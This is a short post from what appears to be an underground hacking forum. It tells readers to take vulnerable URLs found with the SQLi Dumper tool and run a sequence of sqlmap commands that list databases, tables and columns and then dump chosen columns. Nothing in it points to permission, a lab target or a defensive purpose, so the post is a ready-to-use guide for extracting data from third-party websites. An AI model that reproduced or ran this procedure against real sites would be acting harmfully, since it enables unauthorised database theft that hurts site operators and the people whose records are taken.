• We just launched and are currently in beta. Join us as we build and grow the community.

Dumping Databases 10x faster than SQLi

brucehop

Deception Technology Expert
B Rep
0
0
0
Rep
0
B Vouches
0
0
0
Vouches
0
Posts
53
Likes
58
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
Step 1: After going through the whole SQLi Dumper process, find your injectable URL and hold on to it, these are usually found in the "Injectables" tab.

Step 2: Install sqlmap on your preferred operating system, (this requires python).
Step 3: Once installed launch sqlmap from here on out we will refer to this as just "sqlmap" (If installed with apt "sqlmap", if being launched via directory "sqlmap.py" or "python sqlmap.py")

Step 4: Once you have sqlmap open enter the following into the terminal [sqlmap -u "URL"] include the quotations around the URL. Answer the questions to your preference.
Step 5: Scanning is done! Time to dump!

(List databases): sqlmap -u "URL" --dbs
(List tables): sqlmap -u "URL" -D "DATABASE" --tables
(List columns): sqlmap -u "URL" -D "DATABASE" -T "TABLE" --columns
(Initialize dump): sqlmap -u "URL" -D "DATABASE" -T "TABLE" -C "column1, column2, column3" --dump --eta
Found it on a forum, I thought it's worth sharing.
 

422,212

310,551

310,560

Top